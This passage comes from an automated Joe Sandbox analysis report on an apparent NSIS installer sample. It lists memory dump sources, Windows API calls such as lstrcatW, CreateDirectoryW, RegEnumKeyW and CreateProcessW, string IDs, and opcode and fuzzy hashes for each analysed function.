                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: *?|<>/":
                                                  • API String ID: 589700163-165019052
                                                  • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                  • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                  • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                  • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
                                                  • CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5
                                                    • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                    • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                    • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID:
                                                  • API String ID: 1941528284-0
                                                  • Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                  • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                  • Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                  • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401DBC
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                  • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID:
                                                  • API String ID: 3808545654-0
                                                  • Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                  • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                  • Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                  • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401D63
                                                  • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                  • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                  • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                  • Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                  • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                  • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                  • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                  • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                  APIs
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Close$Enum
                                                  • String ID:
                                                  • API String ID: 464197530-0
                                                  • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                  • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                  • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                  • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                  APIs
                                                  • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                  • GetLastError.KERNEL32 ref: 00405976
                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                  • GetLastError.KERNEL32 ref: 00405995
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID:
                                                  • API String ID: 3449924974-0
                                                  • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                  • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                  • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                  • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                  APIs
                                                    • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                    • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,756F2EE0,00405B1A,?,00437800,756F2EE0,00000000), ref: 00405D76
                                                    • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                    • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                  • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,756F2EE0,00405B1A,?,00437800,756F2EE0,00000000), ref: 00405E1E
                                                  • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,756F2EE0,00405B1A,?,00437800,756F2EE0), ref: 00405E2E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: 0_B
                                                  • API String ID: 3248276644-2128305573
                                                  • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                  • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                  • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                  • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 004053F3
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                    • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                  • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                  • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                  • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405F2B
                                                  • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,756F3420,004036EF), ref: 00405F46
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: nsa
                                                  • API String ID: 1716503409-2209301699
                                                  • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                  • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                  • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                  • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                  APIs
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                  • CloseHandle.KERNEL32(?), ref: 00405A07
                                                  Strings
                                                  • Error launching installer, xrefs: 004059E4
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                  • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                  • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                  • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                  • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                  • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                  • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                  • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                  • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                  • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                  • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                  • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                  • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                  • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                  • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                  • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                  • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                  • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                  • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                  • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                  • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                  • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                  • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                  • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                  • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                  • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                  • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                  • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                  • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98